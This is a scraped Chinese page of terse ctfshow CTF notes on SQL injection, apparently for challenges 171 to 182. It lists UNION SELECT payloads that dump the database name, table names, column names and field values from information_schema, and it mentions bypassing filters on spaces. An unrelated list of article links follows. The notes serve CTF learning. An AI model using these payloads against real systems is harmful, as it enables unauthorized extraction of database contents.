当前位置: 首页 > news >正文

ctfshow解题方法

news 2025/8/13 3:07:40

171

172

爆库名->爆表名->爆字段名->爆字段值

-1' union select 1,database() ,3 --+ //返回数据库名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='库名' --+ //获取数据库里的表名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='表名' --+ //获取表内字段名

-1' union select 1,group_concat(字段名1),group_concat(字段名2) from 表名 --+ //获取字段值,有2个表,第一个表的password内有个值为flag not here,第二个表的password内有flag

173

175

176

177

此处是对空格进行绕过

178

179

180

181

182

http://www.lryc.cn/news/408754.html

相关文章:

  • 探索 Blockly:自定义积木实例
  • MongoDB教程(二十三):关于MongoDB自增机制
  • 展馆导览系统架构解析,从需求分析到上线运维
  • Servlet详解(超详细)
  • Meta AI引入Imagine Me功能,上传图片输入提示词即可实现个性化照片
  • 常用自启设置
  • 模块与组件、模块化与组件化的理解
  • Rust:cargo的常用命令
  • LeetCode 3106.满足距离约束且字典序最小的字符串:模拟(贪心)
  • Elasticsearch 与 MySQL 在查询和插入性能上的深度剖析
  • day4 vue2以及ElementUI
  • 把redis用在Java项目
  • GORM:优雅的Go语言ORM库
  • Golang | Leetcode Golang题解之第279题完全平方数
  • Oracle系统表空间的加解密
  • pytorch backbone
  • uniapp 开发app使用renderjs操作dom
  • 【面试题】MySQL `EXPLAIN`的`Extra`字段:深入解析查询优化的隐藏信息
  • Jenkins持续部署
  • 橙单前端项目下载编译遇到的问题与解决
  • 在android中怎么处理后端返回列表中包含图片id,如何将列表中的图片id转化成url
  • IM聊天代码
  • 【Go - context 速览,场景与用法】
  • Linus: vim编辑器的使用,快捷键及配置等周边知识详解
  • 数仓作业延时告警-基于关键路径预推
  • 秋招复习笔记——八股文部分:网络TCP
  • 麒麟桌面操作系统上配置Samba
  • 【Go】探索 Go 语言的内建函数 copy
  • 【React】JSX:从基础语法到高级用法的深入解析
  • JMeter 使用